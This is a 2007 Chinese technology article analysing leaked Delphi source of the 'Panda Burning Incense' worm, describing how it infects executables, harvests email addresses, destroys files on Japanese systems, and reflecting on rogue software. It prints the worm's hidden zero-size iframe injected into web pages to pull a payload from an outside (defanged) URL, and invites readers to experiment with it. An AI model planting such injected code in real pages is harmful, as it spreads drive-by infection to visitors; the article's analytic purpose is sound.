科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网软件频道应用软件“熊猫烧香”源码启示录

“熊猫烧香”源码启示录

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

本文中,作者对这个基于Delphi语言所编写的“熊猫烧香源码”做了进一步分析,并阐述了自己的几点看法。

作者:朱先忠 来源:IT168 2007年9月14日

关键字:

  • 评论
  • 分享微博
  • 分享邮件

此子过程是典型的遍历本机中所有可用盘中的所有子目录下的所有文件并施行相应操作的编码。既如此,那么让我们从Line X开始分析。在确定当前文件为可执行文件(仅针对.EXE和.SCR文件)后,调用子过程InfectOneFile进行特定的感染。接下来,如果文件为某些网页(扩展名为.HTM、.HTML和.ASP),则继续感染这些网页文件—在网页最后加入类似如下的代码段(本代码摘自某君对一种“熊猫病毒”变体的分析结果):

<iframe src="hxxp://www.ctv163.com/wuhan/down.htm"

width="0" height="0" frameborder="0"> </iframe>

于是,用户在启动此网页时,即可把URL导航到自己指定的网址(注:读者试验时不妨修改一下其中的URL,还有width和height等参数,效果会更明显)。接下来,程序进一步判断如果当前文件是电子邮件客户端程序相应的邮件地址数据文件,则取得这些地址信息。虽然此处没有说明如何使用它们,但根据普通蠕虫病毒特征,应该是把带有自身(病毒体)的邮件发送到这些邮件地址,进而达到利用网络传播自身的目的。奇怪的是,等程序执行(判断)到语句“if IsJap then”处—此时已经对满足前面特征的文件执行完相应的感染或传播—才判断操作系统是否为日文版本。如果是,则对另外一些常见文件类型(.DOC、.XLS、.MDB…….AVI)进行彻底破坏(调用过程SmashFile彻底摧毁文件)。看起来,这位“烧香”仁兄也是一位“爱国主义”分子。只可惜,在“打倒日本帝国主义”之前,你的广大同胞已经被“焚得焦头烂额”了。

三、“熊猫烧香”源码告诉我们什么?

(一)病毒的编写变得相对越来越容易

记得本人92年刚从学校毕业时,要想深入学习一点DOS内核编程技术,不得不费神“远程邮寄”参考书。而如今的互联网上黑客教程遍地:XX黑客教程,XX破解教程,各种流行程序漏洞扫描教程……国内的,国外的,应有尽有。另一方面,微机早已进入普通家庭,这对各种计算机技术的普及也起到巨大的推动作用。所有这些极大地推动了病毒编写技术的传播,乃至于几乎人人都能写点病毒,但由于软件编码特有的“细活”之特性,使得不少学习粗心者“无意插柳柳成荫”。

(二)病毒的传播越来越容易

在上面的代码中,我们注意到如下几点:第一,程序遍历磁盘上邮件地址库把自己作为电子邮件附件发送出去;第二,病毒感染网页文件(简单地在网页最后加入一小段代码),致使当前打开此网页时即激活病毒体。这些“作战”手段借助于广泛普及的因特网几乎是一蹴而就的事情。因而,从这种角度讲,病毒的传播已变得越来越容易。

(三)病毒代码传播的两面性

如今回趟沂蒙老家,在普通农庄以ADSL上网已成趋势,而且这种趋势可能较之于有线电视传播更为迅速。似本文“熊猫烧香”病毒“源代码”,其效能如同前面所提之各大“教程”;从其正面看,将极大地推动软件技术的发展和广大软件爱好者的研制技术;但从其消极面看,对于想制造病毒的人来说,也有相当的技术参考价值。只要稍试修改,很多“好事者”都可以藉此制造出病毒变种,说不定哪天又来个“鼠年喊打鼠”,“牛年喊杀牛”。

总之,网络是把双刃,或者说技术是把双刃剑,这在计算机软件业已得到最充分的认证!于此,作者也不由得灵光一现:如果说“护花使者”类软件在国内外极受广大家长用户的欢迎,那么,研究一款辅助警方缉拿这等网络犯罪的共享软件,也必定受宠(提及此,我们不由得再发感叹:也许还是国人软件法不健全,抑或是另有苦衷?网络犯罪岂是来无影去无踪般神话?)。各位仁君不妨一试。

(四)“流氓软件” 离病毒仅一步之遥

且看中国互联网协会公布的流氓软件官方定义: 

恶意软件定义:是指在未明确提示用户或未经用户许可的情况下,在用户计算机或其他终端上安装运行,侵犯用户合法权益的软件,但已被我国现有法律法规规定的计算机病毒除外。其具体特征包括:强制安装、难以卸载、浏览器劫持、广告弹出、恶意收集用户信息、恶意卸载、恶意捆绑以及其他侵犯用户知情权、选择权的恶意行为。

本人从网上也看到此“熊猫烧香”病毒作者留言的病毒制作“动机”,但从该病毒其它版本频繁从后台启动国外指定网页的行为来看,确有其明确的商业动机。中国软件市场之混乱,犹如计算机病毒之“毒瘤”,改革开放之“腐败”毒瘤,不治将恐甚。因此,从最近“熊猫烧香”新版的“金猪闹春”发展势头来看,纵使该作者在论坛上透露将终止继续研发新版本,但国软市场之混乱加上有其巨大的商业利益驱动,他岂能就此罢手?

如今,网上大批特批“流氓软件”,“灰色软件”。请问:这样的日子何时是个尽头?恕在下直言,如果不从根本上整顿国软市场之混乱局面,类似这种在网上疯传的“熊猫烧香”之“源码”必使“灰色软件”愈灰,“流氓软件”之愈流氓!

四、小结 

如今网上流传的“熊猫烧香源码”,不由得不引发人们无尽的思考。我想,联系中国特色的软件市场来认识这样的问题似乎更为合适。“熊猫”、“烧香”本来各自是美好事物和良好祝福的象征,现在却不由得不令人心焦。权当本文系在下之胡言乱语。最后,谨祝各位:金猪之年财运望,发良财,发洋财,而不是发横财!

查看本文来源

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章